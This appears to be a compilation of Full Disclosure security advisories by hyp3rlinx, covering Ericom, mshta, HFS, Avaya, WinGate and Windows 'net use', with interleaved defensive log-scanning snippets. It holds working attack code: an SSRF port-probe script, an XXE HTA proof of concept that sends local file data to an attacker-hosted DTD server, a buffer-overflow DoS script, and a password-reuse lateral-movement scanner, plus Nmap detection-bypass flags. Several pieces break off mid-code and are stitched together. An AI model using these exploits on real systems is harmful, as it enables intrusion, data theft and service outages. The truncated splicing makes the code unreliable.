import websocket ##pip install websocket-client #Required

#By hyp3rlinx
#ApparitionSec
#
#Ericom Access Server v9.2.0 for (AccessNow & Blaze) SSRF
#
BANNER="""
(ASCII art banner)
SSRF Exploit
"""

def ErrorCom(vs,vp,t,p):
    try:
        ws = websocket.create_connection("wss://"+vs+":"+vp+"/blaze/"+t+":"+p, sslopt={'cert_reqs': ssl.CERT_NONE})
        ws.send("SSRF4U!")
        result = ws.recv()
        #print(result)
        if result.find("Cannot connect to")==-1:
            print("[+] Port "+p+" is open for business :)")
        else:
            print("[!] Port " + p+ " is closed :(")
        ws.close()
    except Exception as e:
        print(str(e))

if __name__=="__main__":
    if len(sys.argv) != 5:
        print(BANNER)
        print("[+] Ericom Access Server v9.2.0 - SSRF Exploit - CVE-2020-24548")
        print("[+] By Hyp3rlinX / ApparitionSec")
        print("[!] Usage: ,,,")
        exit()
    if len(sys.argv[4]) > 5:
        print("[!] Port out of range")
        exit()
    print(BANNER)
    ErrorCom(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])

[PoC Video URL]
https://www.youtube.com/watch?v=oDTd-yRxVJ0

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification : June 21, 2020
Received automated reply : June 21, 2020
Request for status : June 30, 2020
Vendor "Forwarded all the detail to our R&D and Management team" : June 30, 2020
Request for status : July 13, 2020
No vendor response
Informed vendor advisory: August 11, 2020
Request for status : August 20, 2020
No vendor response
August 22, 2020 : Public Disclosure
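On the gateway side, the SSRF leaves a clear trace: every forwarded connection is a WebSocket request whose path carries the target as /blaze/host:port. The following is an added example, not part of the advisory or of Ericom's software, that scans constructed access log lines (Common Log Format assumed) for /blaze/ targets that are not the expected remote desktop port, that point at the gateway itself, or that show one client walking many host:port pairs.

```python
import re
import ipaddress
from collections import defaultdict

# Constructed sample lines in Common Log Format, reusing the advisory's addresses
# (gateway 192.168.88.152, attacker 192.168.88.162, victim 192.168.1.104);
# the last two lines stand in for ordinary use of the gateway.
SAMPLE_LOG = """\
192.168.88.162 - - [22/Aug/2020:10:00:01 +0000] "GET /blaze/192.168.1.104:25 HTTP/1.1" 101 0
192.168.88.162 - - [22/Aug/2020:10:00:02 +0000] "GET /blaze/192.168.1.104:22 HTTP/1.1" 101 0
192.168.88.162 - - [22/Aug/2020:10:00:03 +0000] "GET /blaze/192.168.1.104:445 HTTP/1.1" 101 0
192.168.88.162 - - [22/Aug/2020:10:00:04 +0000] "GET /blaze/192.168.1.104:3389 HTTP/1.1" 101 0
192.168.88.162 - - [22/Aug/2020:10:00:05 +0000] "GET /blaze/127.0.0.1:8080 HTTP/1.1" 101 0
10.0.0.7 - - [22/Aug/2020:10:05:00 +0000] "GET /blaze/10.0.0.40:3389 HTTP/1.1" 101 0
10.0.0.7 - - [22/Aug/2020:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The forwarded target is encoded in the request path as /blaze/<host>:<port>.
BLAZE_RE = re.compile(r"^/blaze/(?P<host>[^:/?#]+):(?P<port>\d{1,5})(?:[/?#].*)?$")

def parse_blaze_targets(log_text):
    """Return (client, target_host, target_port) for every /blaze/host:port request."""
    targets = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        b = BLAZE_RE.match(m.group("path"))
        if b:
            targets.append((m.group("client"), b.group("host"), int(b.group("port"))))
    return targets

def is_forbidden_host(host):
    """Targets the gateway should never be asked to reach: itself or non-routable addresses."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False                      # hostname: leave it to the port/allowlist check
    return ip.is_loopback or ip.is_link_local or ip.is_unspecified

def find_ssrf_indicators(log_text, allowed_ports=frozenset({3389}), scan_threshold=4):
    """Flag /blaze/ connections that do not look like remote desktop use.

    unexpected_target: port outside allowed_ports, or a loopback/link-local host
    port_scan_clients: clients asking for >= scan_threshold distinct host:port pairs
    """
    unexpected, per_client = [], defaultdict(set)
    for client, host, port in parse_blaze_targets(log_text):
        per_client[client].add((host, port))
        if port not in allowed_ports or is_forbidden_host(host):
            unexpected.append((client, host, port))
    scanners = sorted(c for c, t in per_client.items() if len(t) >= scan_threshold)
    return {"unexpected_target": unexpected, "port_scan_clients": scanners}

if __name__ == "__main__":
    for key, value in find_ssrf_indicators(SAMPLE_LOG).items():
        print(key, value)
```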
[FD] Microsoft Windows mshta.exe HTA File / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MSHTA-HTA-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows MSHTA.EXE .HTA File

An HTML Application (HTA) is a Microsoft Windows program whose source code consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.
The HTML is used to generate the user interface, and the scripting language is used for the program logic.
An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application.

[Vulnerability Type]
XML External Entity Injection

[Impact]
Information disclosure, Recon

[CVE Reference]
N/A

[Security Issue]
Windows mshta.exe allows processing of XML External Entities; this can result in local data-theft and or program reconnaissance upon opening specially crafted HTA files.

From an attacker perspective, since we are not dependent on scripting languages like Javascript, VBScript or WScript.Shell, we may have better chances at subverting endpoint protection systems as we are only using XML markup.

HTA exploits found online typically show code execution, with reliance on ActiveX Objects and scripting engines, and hence are more easily detected by security products.
Many of these exploits also use payload obfuscation techniques for stealth. However, I found nothing publicly documented that leverages XML injection targeting the mshta.exe HTA file-type.

Yea I know, no code execution. However, we get stealthy data theft with recon capabilities.
Armed with this info, we can more accurately target potential software vulnerabilities at a later date from info gathering a system's program installations.
Usually, this type of recon is seen in first-stage malware infections using the Windows CreateToolhelp32Snapshot API.

Therefore, since there's no documented HTA exploit using XXE attacks for this file type, I release the advisory.

Successfully tested on Windows 10 and Windows Server 2016, 2019.

[Exploit/POC]
Multi program recon and a check if running in a Virtual Machine, all in a single HTA file; change the IP accordingly.

1) "Doit.hta"
http://127.0.0.1:8000/datatears.dtd";> %dtd;]> &send;
http://127.0.0.1:8000/datatears.dtd";> %dtd;]> &send;
http://127.0.0.1:8000/datatears.dtd";> %dtd;]> &send;

2) The "datatears.dtd" DTD file hosted on the attacker's server.
http://127.0.0.1:8000?%file;'>"> %all;

3) Local Python v3 web-server listening on port 8000 to receive the victim's info.
python -m http.server

[POC Video URL]
https://www.youtube.com/watch?v=XaTrBEu4Ghw

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
MSHTA .HTA files are classified untrusted, many threats already well known.
July 4, 2020 : Public Disclosure
[FD] CVE-2020-13432 - HFS HTTP File Server / Remote Buffer Overflow DoS
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.rejetto.com

[Product]
HFS Http File Server v2.3m Build 300

[Vulnerability Type]
Remote Buffer Overflow (DoS)

[CVE Reference]
CVE-2020-13432

[Security Issue]
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual files or folders are used, allows remote attackers to trigger an invalid-pointer write access violation via concurrent HTTP requests with a long URI or long HTTP headers like Cookie, User-Agent etc.

Remote unauthenticated attackers can send concurrent HTTP requests using an incrementing or specific payload range of junk characters for values in the URL parameters or HTTP headers sent to the server.
This results in an hfs.exe server crash from an invalid pointer write access violation.

Requirements: hfs.exe must have at least one saved virtual file or folder present.
Test using a remote IP and NOT from the same machine (localhost).

Dump...

(e4c.3a8): Access violation - code c005 (first/second chance not available)
For analysis of this file, run !analyze -v
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b esi= edi=0002
eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
777ef8b4 53 pushebx

0:000> !load winext/msec
0:000> !exploitable
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
*** WARNING: Unable to verify checksum for hfs.exe
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0018 (Hash=0x7a29717c.0x325e6a71)
PROCESS_NAME: hfs.exe
FOLLOWUP_IP: hfs+8fad7
0048fad7 8945f0 mov dword ptr [ebp-10h],eax
WRITE_ADDRESS: 000a0e08

[References]
https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01

[Exploit/POC]
from socket import *
import time,sys

#HFS HTTP File Server v2.3m build 300.
#Vendor: www.rejetto.com
#Remote Buffer Overflow DoS
#Note: hfs.exe must have at least one saved virtual file or folder on the target
#test using a remote IP and not from the same machine.
#Discovery: hyp3rlinx
#hyp3rlinx.altervista.org
#ISR: ApparitionSec
#=

res=""
once=0
cnt=0
max_requests=1666

def hfs_dos():
    global ip,port,length,res,once,cnt,max_requests
    cnt+=1
    length += 1
    payload = "A"*length
    try:
        s=socket(AF_INET, SOCK_STREAM)
        s.settimeout(2)
        s.connect((ip,port))
        ##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
        bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
        s.send(bof.encode("utf-8"))
        if once==0:
            once+=1
            res = s.recv(128)
            if res != "":
                print("Targets up please wait...")
            if "HFS 2.3m" not in str(res):
                print("[!] Non vulnerable HFS version, exiting :(")
                exit()
    except Exception as e:
        if e != None:
            if str(e).find("timed out")!=-1:
                if res=="":
                    print("[!] Target is not up or behind a firewall? :(")
                    exit()
                else:
                    print("[!] Done!")
                    exit()
    s.close()
    if cnt == max_requests:
        return False
    return True

def msg():
    print("HFS HTTP File Server v2.3m build 300.")
    print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
    print("Virtual HFS saved file or folder required.")
    print("Run from a different machine (IP) than the target.")
    print("By Hyp3rlinx - ApparitionSec\n")

if __name__=="__main__":
    length=3
    if len(sys.argv) != 3:
        msg()
        print("Usage: , ")
        exit()
    ip = sys.argv[1]
    port = int(sys.argv[2])
    msg()
    while True:
        if not hfs_dos():
            print("[!] Failed, non vuln version or no virtual files exist :(")
            break

[POC Video URL]
https://www.youtube.com/watch?v=qQ-EawfXuWY

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: May 18, 2020
Vendor reply: May 18, 2020
Vendor confirms vulnerability: May 19, 2020
Vendor creates fix: May 20, 2020
Vendor released new version 2.4 :
[FD] Avaya IP Office v9.1.8.0 - 11 Insecure Transit Password Disclosure CVE-2020-7030
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.avaya.com

[Product]
Avaya IP Office v9.1.8.0 - 11

IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively.

[Vulnerability Type]
Insecure Transit Password Disclosure

[CVE Reference]
CVE-2020-7030
ASA-2020-077

[Security Issue]
A sensitive information disclosure vulnerability exists in the web interface component of IP Office that may potentially allow a local user to gain unauthorized access to the component.

The request URL on port 7071 and the web socket component requests on port 7070 used by the Atmosphere-Framework within Avaya IP Office pass Base64 encoded credentials as part of the URL query string.

https://:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US

wss://:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0&X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true

Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y
Value: Administrator:Administrator

The Base64 encoded credentials can be easily disclosed if the machine used to log on to the web Manager is accessed by an attacker.
The URL plus the credentials can potentially be leaked or stored in some of the following locations.

Browser History
Browser Cache
Browser Developer Tools
Cached by web proxy
Referer Header
Web Logs
Shared Systems

[Avaya Products affected]
Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2

[References]
https://downloads.avaya.com/css/P8/documents/101067493

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: February 19, 2020
Vendor confirms issue: March 4, 2020
Vendor release advisory fix : June 3, 2020
June 4, 2020 : Public Disclosure
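Because the credential travels as a Base64 token in the URL, it is also easy to hunt for in the places listed above. The following is an added example, not part of the advisory, that scans constructed proxy-log or browser-history lines (the two Avaya URLs quoted above, host left as x.x.x.x, plus a benign one) for Base64 tokens in the query string or path that decode to a printable user:password pair, and reports them with the password masked.

```python
import re
import base64
import binascii
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines as a proxy log or browser history export might carry them.
# The first two are the URLs quoted in the advisory; the third is ordinary static content.
SAMPLE_LINES = [
    "https://x.x.x.x:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US",
    "wss://x.x.x.x:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y"
    "?X-Atmosphere-tracking-id=0&X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket"
    "&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true",
    "https://x.x.x.x:7071/serveredition/static/app.nocache.js?v=9.1.8.0",
]

# A run of Base64 alphabet characters long enough to hold a short user:password pair.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decode_if_credential(token):
    """Return (user, secret) when a Base64 token decodes to printable 'user:secret', else None."""
    try:
        raw = base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text.isprintable() or ":" not in text:
        return None
    user, secret = text.split(":", 1)
    return (user, secret) if user and secret else None

def mask(secret):
    """Keep the first two characters so a finding can be matched to an account without logging it."""
    return secret[:2] + "*" * (len(secret) - 2)

def find_credential_leaks(lines):
    """Scan URL-bearing lines for Base64 'user:password' tokens in query parameters or path segments."""
    findings = []
    for line in lines:
        parts = urlsplit(line.strip())
        places = [("query:" + k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
        places += [("path", seg) for seg in parts.path.split("/") if seg]
        for location, value in places:
            for token in B64_RE.findall(value):
                cred = decode_if_credential(token)
                if cred:
                    findings.append({
                        "url": parts.scheme + "://" + parts.netloc + parts.path,
                        "location": location,
                        "user": cred[0],
                        "password_masked": mask(cred[1]),
                    })
    return findings

if __name__ == "__main__":
    for f in find_credential_leaks(SAMPLE_LINES):
        print(f)
```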
[FD] WinGate v9.4.1.5998 Insecure Permissions EoP CVE-2020-13866
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINGATE-INSECURE-PERMISSIONS-LOCAL-PRIVILEGE-ESCALATION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
wingate.com

[Product]
WinGate v9.4.1.5998

WinGate is a sophisticated integrated Internet gateway and communications server designed to meet the control, security and email needs of today's Internet-connected businesses.

[Vulnerability Type]
Insecure Permissions EoP

[CVE Reference]
CVE-2020-13866

[Security Issue]
WinGate has insecure permissions for the installation directory, which allows local users the ability to gain privileges by replacing an executable file with a Trojan horse.
The WinGate directory hands (F) full control to authenticated users, who can then run arbitrary code as SYSTEM after a WinGate restart or system reboot.

C:\Program Files\WinGate>cacls WinGate.exe
C:\Program Files\WinGate\WinGate.exe NT AUTHORITY\Authenticated Users:(ID)F
                                     NT AUTHORITY\SYSTEM:(ID)F
                                     BUILTIN\Administrators:(ID)F
                                     BUILTIN\Users:(ID)R
                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R

[Affected Component]
WinGate Installation Directory

[Impact Code execution]
true

[Impact Denial of Service]
true

[Impact Escalation of Privileges]
true

[Impact Information Disclosure]
true

[Exploit/POC]
Logon as a standard user, replace WinGate.exe with a trojan executable, wait for a restart or reboot the system, and your code runs as SYSTEM.

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: May 10, 2020
Vendor acknowledgement: May 10, 2020
Vulnerability confirmed: May 18, 2020
Request status: May 22, 2020
No reply
Notify vendor request CVE: May 26, 2020
No reply
Advised of public disclosure: June 1, 2020
No reply
June 4, 2020 : Public Disclosure
[FD] netABuse - Windows Insufficient Authentication Logic Scanner
import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process

#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#Advisory: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
#---
#When a remote systems built-in Administrator account is enabled and both the remote and the target system
#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.
#
#MountPoints2 and Terminal server client hints in the Windows registry can help us.
#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.
#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#---

BANNER=""" | \ __ ) __ \_ \ __|_ \__ \ | | __| _ \ | | __/ | ___ \ | | | | \__ \ __/ _| _| \___| \__| _/_\ / \__,_| / \___| By Hyp3rlinx ApparitionSec """

DRIVE="X"
FINDME="The command completed successfully."
REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"'
REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s"
VULN_FOUND=set()
DELAY=2 #Any lower and we may get inaccurate results.
rdp_server_lst=[]

#Return prior network logons to remote systems.
def mountpoints2():
    mntpoint2_connections=[]
    try:
        p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True)
        tmp = p.stdout.readlines()
    except Exception as e:
        print("[!] "+str(e))
        return False
    for x in tmp:
        idx = x.find("##")
        clean = x[idx:]
        idx2 = clean.rfind("#")
        ip = clean[2:idx2]
        ip = re.sub(r"#.*[A-Z,a-z]","",ip)
        if ip not in mntpoint2_connections:
            mntpoint2_connections.append(ip)
    mntpoint2_connections = list(filter(None, mntpoint2_connections))
    p.kill()
    return mntpoint2_connections

#Terminal server client stores remote server connections.
def rdp_svrs():
    global rdp_server_lst
    try:
        p = Popen(REG_RDPUSERS, stdout=PIPE, stderr=PIPE, shell=True)
        tmp = p.stdout.readlines()
        for key in tmp:
            if key.find("Servers")!=-1:
                pos = key.rfind("\\")
                srv = key[pos + 1:].replace("\r\n","").strip()
                rdp_server_lst.append(srv)
        p.kill()
    except Exception as e:
        print("[!] "+str(e))
        return False
    return True

#Disconnect
def del_vuln_connection(ip):
    try:
        print("[!] Disconnecting vuln network logon connection.\n")
        call(r"net use "+DRIVE+":"+" /del")
    except Exception as e:
        print("[!] "+str(e))

#Check connection
def chk_connection(ip):
    print("[+] Testing: "+ip)
    sys.stdout.flush()
    cmd = Popen(['ping.exe', ip, "-n", "1"], stderr=PIPE, stdout=PIPE, shell=True)
    stderr, stdout = cmd.communicate()
    if "Reply from" in stderr and "Destination host unreachable" not in stderr:
        print("[*] Target up!")
        return True
    else:
        print("[!] Target unreachable :(")
        return False

#Test vuln
def Test_Password_Reuse(ip):
    print("[+] Testing "+ip + " the builtin Administrator account.\n")
    sys.stdout.flush()
    try:
        p = Popen("net use X: "+ip+"\\c$ /user:Administrator", stdout=PIPE, stderr=PIPE, shell=True)
        err = p.stderr.readlines()
        if err:
            e = str(err)
            if e.find("error 53")!=-1:
                print("[*] Network path not found\n")
                return
            elif e.find("error 1219")!=-1:
                print("[*] Target connections to a server or shared resource by the same user, using more than one user name are disallowed.\n")
                return
            elif e.find("error 85")!=-1:
                print("[*] The local device name is already in use.\n")
                return
            else:
                print(e+"\n")
        tmp = p.stdout.read()
        if FINDME in tmp:
            print("[*] Password reuse for the built-in Administrator found!")
            print("[+] Connected
[FD] Microsoft Windows "net use" Logon CMD / Insufficient Password Prompt
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows "net use" Command

Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections.

[Vulnerability Type]
Insufficient Password Prompt

[CVE Reference]
N/A

[Security Issue]
The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account is enabled and both remote and originating systems suffer from password reuse.

This also works as a "standard" user but unfortunately we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to has other vulnerabilities present.

In contrast, authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. The authentication mechanisms between the two network logon methods are inconsistent and in my opinion leave an authentication loophole invitation.

Moreover, since this targets the built-in Administrator account, one would think there would be more or equal security measures in place, not less.

Requirements:
1) Remote system built-in Administrator account is enabled
2) Origination system user's account password and the remote system Administrator password match (reuse).

Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue.

However, if "FilterAdministratorToken" is enabled in the registry on the remote system then the above loophole scenario fails. Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry.

Therefore, if an attacker pops a box they can check "MountPoints2" registry values, usually used by forensic analysts for previous network connections, and try them, and if there's password reuse (likely) BOOM automagic logon.

This vuln occurs due to inconsistent password dialog prompting depending on whether the "net use" logon method is used.

When testing make sure to logout then log back in after changing passwords so the environment is clean.

e.g.

1) Passwords for both systems are different and remote built-in Administrator account active:

C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
Enter the password for 'Administrator' to connect to '192.168.x.x':
System error 5 has occurred.

Access is denied.

2) Passwords for both origination system and remote match:

C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator
The command completed successfully.

By the way, as a side note, DCERPC calls work as well if both systems happen to have the same password.

c:\>getmac /s x.x.x.x /U Administrator

MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same."

Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box?

Expected result: Consistent password dialog box, no matter if passwords match or not.
Actual Result: No prompt for a password if both systems' passwords are the same.

Tested successfully on fully patched Windows 10 using a VM, also across LAN to a non-domain connected PC.
[Exploit/POC]

import os,re,time,signal,sys
from subprocess import *
from multiprocessing import Process

#By John Page (aka hyp3rlinx)
#Apparition Security
#twitter.com/hyp3rlinx
#---
#When a remote systems built-in Administrator account is enabled and both the remote and the target system
#passwords match (password reuse) theres no prompt for credentials and we get logged in automagically.
#
#MountPoints2 and Terminal server client hints in the Windows registry can help us.
#Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously.
#REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons)
#MountPoints2 key entries are stored like '##10.2.1.40#c$'
#---

BANNER=""" _ __ ___ __ ___ __ / | / / /_ __/ / | / __ )/ / / / ___// / / |/ / __/ / /
[FD] Recon-Informer v1 - Intel for offensive systems tool.
import logging,os,ctypes,sys,argparse,time,re
from subprocess import *
from datetime import datetime
from pkgutil import iter_modules
import pkg_resources

#Recon-Informer (c)
#By John Page (Hyp3rlinx)
#ApparitionSec
#hyp3rlinx.altervista.org
#twitter.com/hyp3rlinx
#apparition...@gmail.com
#PoC Video URL: https://www.youtube.com/watch?v=XM-G9Udbphc
#==
#
#Recon-Informer is a basic real-time anti-reconnaissance detection tool for offensive
#security systems, useful for penetration testers. It runs on Windows/Linux and leverages scapy.
#
#Purpose:
#Recon-Informer is NOT meant for protecting public facing or lan critical enterprise systems whatsoever.
#Its purpose is detect possible recon against our attacker system on a LAN to provide us defensive intel.
#Therefore, this script is most useful for basic short-term defensive visibility.
#
#Features:
#Attempt to detect and identify typical port scans generated using Nmap including scan type.
#-sS, -sC, -F, -sR, -sT, -sA, -sW, -sN, -sF, -sX, -sM, -sZ, -sY, -sO, -sV, -sP, -sn, -f (fragment scan), -D (Decoy).
#
#FYI, scans such as FIN don't work well on windows OS and firewalls can make scans return incorrect result.
#XMAS scans work against systems following RFC 793 for TCP/IP and don't work against any Windows versions,
#NULL is another type that don't work well on Windows.
#
#However, Fin, Null and Xmas scans can work on Linux machines. Therefore, Recon-Informer checks the OS
#its run on and reports on scans that affect that OS, unless the -s "scan_type" flag is supplied.
#With -s flag you can add extra scan types to detect that otherwise would be ignored.
#
#PING SWEEP (-sP, -sn, -sn -PY, -sY -PY) disabled by default.
#Not enabled by default as most Nmap scans begin with an ARP who-has request, when using -p flag you
#will see this detection preceding most scans. Also, you may see (noise) non-reconnaissance related ARP
#requests or even ones resulting from your own ICMP pings, this exclusive detection may fail if a scan uses -Pn flag.
#
#ICMP
#Note: If nmap --disable-arp-ping flag is supplied for the scan it will be detected as ICMP ping.
#
#BLOCK -b offending IP(s) default is no blocking as packets can be spoofed causing DoS.
#Firewall rule for blocks are in-bound "ANY" but still allows out-bound.
#FW rules are named like ReconInformer_.
#
#DELETE FW RULE -d to remove FW rules for blocked hosts.
#
#WHITELIST -w HOST-IP(s) you never want to block on.
#
#FILTER DEST PORTS -f (filter_dst_port) cut down noisy ports like TCP 2869, NetBIOs 137 etc.
#ignore packets destined for specific ports to try reduce false positive probe alerts.
#
#IGNORE HOST -n don't process packets from specific hosts, e.g. intranet-apps, printers and ACKS
#from SMB connected shares to try reduce false positives.
#
#LOG -l flag, default size limit for writing to disk is 1MB.
#
#UDP protocol is ignored by default to try reduce false positives from sources like NetBIOS, SNMP etc.
#To detect UDP scans use the -u flag, then can also combine with -f port filter
#(reduce noise) on specific dest ports like 137,161,1900,2869,7680.
#
#PCAP saving -s flag, default size limit is also 1MB.
#
#RESTORE CONSOLE -r focus the console window (Win OS) if console is minimized on port scan detect.
#
#Private Network range:
#Wrote this for basic LAN visibility for my attacker machine, packets from public IP ranges are ignored.
#
#BYPASS examples --scanflags and custom packet window sizes:
#Recon-Informer does not try to detect every case of --scanflags or specially crafted packets.
#
#These scans can bypass Recon-Informer and correctly report open ports found.
#nmap -n -Pn -sS --scanflags PSHSYN x.x.x.x -p139
#nmap -P0 -T4 -sS --scanflags=SYNPSH x.x.x.x
#
#Therefore, I accounted for some of these in Recon-Informer to report these detections.
#
#SCANFLAGS
#nmap -P0 -T4 -sS --scanflags=SYNURG x.x.x.x -p139 (returns correct)
#nmap -P0 -T4 -sS --scanflags=PSHSYNURG x.x.x.x -p21-445 (returns correct)
#nmap -P0 -T4 -sS --scanflags=ECE x.x.x.x shows up as NULL scan (nothin useful returned)
#nmap -n -Pn -sS --scanflags 0x42 x.x.x.x -p139 (useful)
#nmap -n -Pn -sS --scanflags=SYNPSH x.x.x.x -p135 (useful)
#
#The above scanflag examples would have bypassed detection if we didn't check packets for them.
#Use ful scanflags that return open ports and bypassed Recon-Informer prior to scanflag checks:
#
#10  (0x00a) SYNPSH
#34  (0x022) SYNURG
#42  (0x02a) SYNPSHURG
#66  (0x042) SYNECN
#74  (0x04a) SYNPSHECN
#98  (0x062) SYNURGECN
#106 (0x06a) SYNPSHURGECN
#130 (0x082) SYNCWR
#138 (0x08a) SYNPSHCWR
#162 (0x0a2) SYNURGCWR
#170 (0x0aa) SYNPSHURGCWR
#194 (0x0c2) SYNECNCWR
#202 (0x0ca) SYNPSHECNCWR
#226 (0x0e2) SYNURGECNCWR
#234 (0x0ea) SYNPSHURGECNCWR
#
#Custom packet window size from 1024 typical of Nmap SYN scans to a size of 666 for the bypass!.
#ip=IP(dst="192.168.1.104")
#syn=TCP(sport=54030,dport=139,window=666,flags="
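As an added example (mine, not Recon-Informer code): the flag-byte logic the comments above describe, in Python. It names the Nmap scan type for a stray TCP segment, generates the fifteen SYN-plus-extras --scanflags values listed above from the flag bits rather than from a table, and runs over a constructed set of probes. The sample addresses are from the 192.0.2.0/24 documentation range.

```python
from itertools import combinations

# TCP flag bits (RFC 793 plus the ECE/CWR bits of RFC 3168).
FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
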